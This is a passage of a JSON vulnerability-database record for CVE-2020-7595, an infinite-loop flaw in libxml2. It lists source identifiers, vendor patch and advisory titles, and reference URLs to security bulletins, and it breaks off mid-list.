{
"db": "AUSCERT",
"id": "ESB-2021.4058",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158168",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041514",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091331",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052216",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072097",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021111735",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2020-04827",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-185720",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-7595",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162142",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161016",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162130",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159553",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160961",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159639"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"id": "VAR-202001-1866",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
}
],
"trust": 0.7003805
},
"last_update_date": "2026-03-09T20:18:55.809000Z",
"patch": {
"_id": null,
"data": [
{
"title": "libxml2 Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=109237"
},
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2020-7595",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=8128495aba3a49b2f3e0b9ee0e8401af"
},
{
"title": "Ubuntu Security Notice: libxml2 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4274-1"
},
{
"title": "Red Hat: Moderate: libxml2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204479 - Security Advisory"
},
{
"title": "Red Hat: Moderate: libxml2 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203996 - Security Advisory"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2020-7595 log"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP3 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202646 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.37 SP3 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202644 - Security Advisory"
},
{
"title": "Amazon Linux AMI: ALAS-2020-1438",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2020-1438"
},
{
"title": "Arch Linux Advisories: [ASA-202011-15] libxml2: multiple issues",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202011-15"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1534",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1534"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=0d160980ab72db34060d62c89304b6f2"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless 1.11.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205149 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.6 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204255 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204254 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless 1.12.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210146 - Security Advisory"
},
{
"title": "Red Hat: Low: OpenShift Container Platform 4.3.40 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204264 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6 compliance-operator security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210190 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6 compliance-operator security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210436 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Quay v3.3.3 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20210050 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM Security Guardium is affected by multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=3201548b0e11fd3ecd83fd36fc045a8e"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Container Storage 4.6.0 security, bug fix, enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205605 - Security Advisory"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-835",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.5,
"url": "https://usn.ubuntu.com/4274-1/"
},
{
"trust": 2.4,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-103-08"
},
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.9,
"url": "https://security.gentoo.org/glsa/202010-04"
},
{
"trust": 1.8,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-292794.pdf"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200702-0005/"
},
{
"trust": 1.8,
"url": "https://gitlab.gnome.org/gnome/libxml2/commit/0e1a49c89076"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00009.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00047.html"
},
{
"trust": 1.5,
"url": "https://access.redhat.com/security/cve/cve-2020-7595"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/545spoi3zppnpx4tfrive4jvrtjrkull/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5r55zr52rmbx24tqtwhciwkjvrv6yawi/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/jdpf3aavkuakdyfmfksiqsvvs3eefpqh/"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7595"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2019-20388"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/cve/cve-2019-19956"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5r55zr52rmbx24tqtwhciwkjvrv6yawi/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/545spoi3zppnpx4tfrive4jvrtjrkull/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/jdpf3aavkuakdyfmfksiqsvvs3eefpqh/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6455281"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3535/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0902/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3248/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2162/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1727"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1207"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affected-by-libxml2-vulnerabilities-cve-2019-19956-cve-2019-20388-cve-2020-7595/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-4/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0171/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3072"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bladecenter-advanced-management-module-amm-is-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4100/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6520474"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0845"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0691"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162694/red-hat-security-advisory-2021-2021-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0099/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4058"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1638/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/libxml2-infinite-loop-via-xmlstringlendecodeentities-31396"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3868/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1744"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072097"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158168/red-hat-security-advisory-2020-2646-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111735"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0319/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0471/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4513/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-security-is-affected-by-multiple-vulnerabilities-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0234/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0584"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-6/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1564/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-flex-system-chassis-management-module-cmm-is-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0864"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0986"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-bootable-media-creator-bomc-is-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159349/red-hat-security-advisory-2020-3996-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-6/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091331"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159851/red-hat-security-advisory-2020-4479-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1242"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041514"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1826/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159639/gentoo-linux-security-advisory-202010-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3102/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3550"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161916/red-hat-security-advisory-2021-0949-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-products-are-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-5/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3631/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3364/"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-20907"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-1971"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12401"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1971"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12243"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-6829"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-8177"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12403"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12400"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12243"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12400"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17498"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17498"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12402"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19221"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16168"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-9327"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13630"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20387"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5018"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20218"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19221"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-6405"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13631"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20387"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-5018"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13632"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14422"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20218"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16168"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12402"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12401"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12403"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20916"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13631"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13632"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8492"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13630"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-12652"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14973"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12652"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14973"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-5313"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-24659"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10029"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-19126"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19126"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/835.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949582"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.5/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2021"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8492"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1079"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3156"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3447"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20178"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9802"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:0190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14382"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3899"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8819"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3867"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3900"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9805"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8710"
},
{
